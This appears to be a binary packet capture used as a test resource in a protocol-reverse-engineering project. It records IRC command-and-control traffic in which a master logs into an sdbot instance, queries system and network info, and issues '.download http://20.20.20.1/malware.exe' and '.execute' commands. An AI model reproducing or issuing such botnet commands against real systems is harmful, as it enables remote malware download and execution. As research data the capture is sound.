Files
CCSDS_study/netzob-030/test/resources/pcaps/botnet_irc_bot.pcap

21 lines
3.2 KiB
Plaintext
Raw Normal View History

2026-05-05 21:54:35 +08:00
<EFBFBD>ò<EFBFBD><00><><00>_Ov<4F>``'GH<47>'<27>PER<><52>@@?<3F> R<><52><EFBFBD><EFBFBD><EFBFBD>3| P<16>Pp:fhhhs!fhhhs@20.20.20.2 JOIN :#dark-chan
<00>_O a<<'<27>P'GH<47>E(J@<00>`<60>R <0B>3| <0C><><EFBFBD>P<10>~*<2A>PING :<11>_On<4F>TT'<27>P'GH<47>EFJ@<00>`sR <0B>3| <0C><><EFBFBD>P<18>~<7E>BPRIVMSG fhhhs :.login r7vygh!
<11>_O<5F><4F>66'GH<47>'<27>PE(<28><>@@?<3F> R<><52><EFBFBD><01>3|*P<16>R<11>_Omrr'GH<47>'<27>PEd<><64>@@?<3F> R<><52><EFBFBD><01>3|*P<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :password accepted.
<11>_O5<4F><<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|*<2A><><EFBFBD>=P<10>B*<2A>PING :<15>_OX MM'<27>P'GH<47>E?J@<00>`xR <0B>3|*<2A><><EFBFBD>=P<18>B+<2B>PRIVMSG fhhhs :.status
<15>_O ~~'GH<47>'<27>PEp<><70>@@?{ R<><52><EFBFBD>=<3D>3|AP<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :sdbot 0.5b ready. Up 0d 0h 0m.
<16>_OL<<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|A<><41><EFBFBD><EFBFBD>P<10><>*<2A> FGECE<1A>_O<5F><4F>NN'<27>P'GH<47>E@J@<00>`uR <0B>3|A<><41><EFBFBD><EFBFBD>P<18><><EFBFBD><EFBFBD>PRIVMSG fhhhs :.sysinfo
<1A>_OJ~66'GH<47>'<27>PE(<28><>@@?<3F> R<><52><EFBFBD><EFBFBD><EFBFBD>3|YP<16> <0A><1B>_O_<4F><00><00>'GH<47>'<27>PEê<>@@?& R<><52><EFBFBD><EFBFBD><EFBFBD>3|YP<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :cpu: 0MHz. ram: 196080KB total, 84724KB free. os: Windows XP [Service Pack 3] (5.1, build 2600). uptime: 0d 0h 4m
<1B>_O6 <<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|Y<><59><EFBFBD> P<10>_*t FGECE<1F>_Om<4F> NN'<27>P'GH<47>E@J@<00>`sR <0B>3|Y<><59><EFBFBD> P<18>_<EFBFBD><5F>PRIVMSG fhhhs :.netinfo
<1F>_O<5F><4F> 66'GH<47>'<27>PE(<28><>@@?<3F> R<><52><EFBFBD> <20>3|qP<16> <0C><1F>_O3M<00><00>'GH<47>'<27>PE<00><><EFBFBD>@@?6 R<><52><EFBFBD> <20>3|qP<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :connection type: LAN (LAN Connection). local IP address: 20.20.20.2. connected from: 20.20.20.2
<20>_Oz <<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|q<><71><EFBFBD><EFBFBD>P<10><>*\PING :@<40>_OJ}~~'<27>P'GH<47>EpJ@<00>`AR <0B>3|q<><71><EFBFBD><EFBFBD>P<18>֙<EFBFBD>PRIVMSG fhhhs :.download http://20.20.20.1/malware.exe E:\malware.exe 0
@<40>_O<5F><4F><00><00>'GH<47>'<27>PE~<7E><>@@?h R<><52><EFBFBD><EFBFBD><EFBFBD>3|<7C>P<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :downloading http://20.20.20.1/malware.exe...
@<40>_ONH<<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|<7C><><EFBFBD><EFBFBD><EFBFBD>P<10><>* FGECE@<40>_O
<EFBFBD><00><00>'GH<47>'<27>PE<00><><EFBFBD>@@?\ R<><52><EFBFBD><EFBFBD><EFBFBD>3|<7C>P<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :downloaded 1805.9 kb to E:\malware.exe @ 1805.9 kb/sec.
@<40>_O<5F>[<<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|<7C><><EFBFBD><EFBFBD>`P<10>*PING :M<>_O2<4F>__'<27>P'GH<47>EQJ@<00>`]R <0B>3|<7C><><EFBFBD><EFBFBD>`P<18>aPRIVMSG fhhhs :.execute E:\malware.exe 0
M<EFBFBD>_OB<EFBFBD>vv'GH<47>'<27>PEh<><68>@@?| R<><52><EFBFBD>`<60>3|<7C>P<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :couldn't execute file.
M<EFBFBD>_OЗ<<'<27>P'GH<47>E(J@<00>`<60>R <0B>3|<7C><><EFBFBD><EFBFBD><EFBFBD>P<10><>)<29>PING :^<5E>_O?{__'<27>P'GH<47>EQJ @<00>`[R <0B>3|<7C><><EFBFBD><EFBFBD><EFBFBD>P<18><> HPRIVMSG fhhhs :.execute 1 E:\malware.exe
^<5E>_O9 66'GH<47>'<27>PE(<28><>@@?<3F> R<><52><EFBFBD><EFBFBD><EFBFBD>3} P<16>
<EFBFBD>c<>_O MM'<27>P'GH<47>E?J!@<00>`lR <0B>3} <0B><><EFBFBD><EFBFBD>P<18><>,PRIVMSG fhhhs :.logout
c<EFBFBD>_O1 66'GH<47>'<27>PE(<28><>@@?<3F> R<><52><EFBFBD><EFBFBD><EFBFBD>3}"P<16>
<EFBFBD>c<>_O<5F> ww'GH<47>'<27>PEi<><69>@@?x R<><52><EFBFBD><EFBFBD><EFBFBD>3}"P<16>P<EFBFBD>:fhhhs!fhhhs@20.20.20.2 PRIVMSG master :user master logged out.
c<EFBFBD>_Oj0 <<'<27>P'GH<47>E(J"@<00>`<60>R <0B>3}"<22><><EFBFBD><EFBFBD>P<10><>)<29> EDE